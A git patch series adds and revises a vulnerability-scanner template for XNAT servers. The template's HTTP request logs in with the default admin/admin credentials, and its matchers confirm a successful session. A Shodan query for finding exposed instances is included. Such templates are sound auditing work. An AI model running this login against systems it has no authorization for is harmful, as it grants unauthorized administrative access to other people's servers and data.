From 1a41583c2f5518db9d761d5f194ef0585d1cef1d Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 1 Nov 2022 06:35:13 +0900
Subject: [PATCH 1/4] Create xnat-default-login.yaml

---
 xnat-default-login.yaml | 45 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 xnat-default-login.yaml

diff --git a/xnat-default-login.yaml b/xnat-default-login.yaml
new file mode 100644
index 0000000000..cc2165c3e3
--- /dev/null
+++ b/xnat-default-login.yaml
@@ -0,0 +1,45 @@
+id: xnat-default-login
+
+info:
+  name: XNAT Default Login
+  author: 0x_Akoko
+  severity: high
+  description: XNAT default login information (admin/admin) was discovered.
+  classification:
+    cwe-id: CWE-798
+  tags: xnat,default-login
+
+requests:
+  - raw:
+      - |
+        GET /login HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/app/template/Login.vm
+
+        login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
+
+    cookie-reuse: true
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+
+      - type: word
+        part: location
+        words:
+          - "app/template/Index.vm?login=true"

From 513f2baa93ff3f64b9683dcce91b5a8c61c76a26 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 1 Nov 2022 03:24:50 +0530
Subject: [PATCH 2/4] Update xnat-default-login.yaml

---
 xnat-default-login.yaml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/xnat-default-login.yaml b/xnat-default-login.yaml
index cc2165c3e3..8147a4a94a 100644
--- a/xnat-default-login.yaml
+++ b/xnat-default-login.yaml
@@ -7,6 +7,9 @@ info:
   description: XNAT default login information (admin/admin) was discovered.
   classification:
     cwe-id: CWE-798
+  metadata:
+    verified: true
+    shodan-dork: http.title:"XNAT"
   tags: xnat,default-login
 
 requests:

From 9bb662bc8a49edb14d1472105c3b98dfddac9bf9 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 1 Nov 2022 11:48:37 +0530
Subject: [PATCH 3/4] Update and rename xnat-default-login.yaml to
 default-logins/xnat-default-login.yaml

---
 .../xnat-default-login.yaml                   | 26 +++++++------------
 1 file changed, 9 insertions(+), 17 deletions(-)
 rename xnat-default-login.yaml => default-logins/xnat-default-login.yaml (69%)

diff --git a/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml
similarity index 69%
rename from xnat-default-login.yaml
rename to default-logins/xnat-default-login.yaml
index 8147a4a94a..b5baf695c5 100644
--- a/xnat-default-login.yaml
+++ b/default-logins/xnat-default-login.yaml
@@ -5,30 +5,20 @@ info:
   author: 0x_Akoko
   severity: high
   description: XNAT default login information (admin/admin) was discovered.
-  classification:
-    cwe-id: CWE-798
   metadata:
     verified: true
-    shodan-dork: http.title:"XNAT"
-  tags: xnat,default-login
+    shodan-query: http.title:"XNAT"
+  tags: default-login,xnat
 
 requests:
   - raw:
-      - |
-        GET /login HTTP/1.1
-        Host: {{Hostname}}
-        Origin: {{BaseURL}}
-
       - |
         POST /login HTTP/1.1
         Host: {{Hostname}}
-        Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
-        Referer: {{BaseURL}}/app/template/Login.vm
 
         login_method=localdb&username={{username}}&password={{password}}&login=&XNAT_CSRF=
 
-    cookie-reuse: true
     attack: pitchfork
     payloads:
       username:
@@ -38,11 +28,13 @@ requests:
 
     matchers-condition: and
     matchers:
+      - type: word
+        part: header
+        words:
+          - "app/template/Index.vm?login=true"
+          - "JSESSIONID"
+        condition: and
+
       - type: status
         status:
           - 302
-
-      - type: word
-        part: location
-        words:
-          - "app/template/Index.vm?login=true"

From aa5b94adda4eaae47230eec95f2f872e9253927d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 1 Nov 2022 11:50:25 +0530
Subject: [PATCH 4/4] Update xnat-default-login.yaml

---
 default-logins/xnat-default-login.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/default-logins/xnat-default-login.yaml b/default-logins/xnat-default-login.yaml
index b5baf695c5..8c9a28b01e 100644
--- a/default-logins/xnat-default-login.yaml
+++ b/default-logins/xnat-default-login.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: XNAT default login information (admin/admin) was discovered.
+  reference:
+    - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin
   metadata:
     verified: true
     shodan-query: http.title:"XNAT"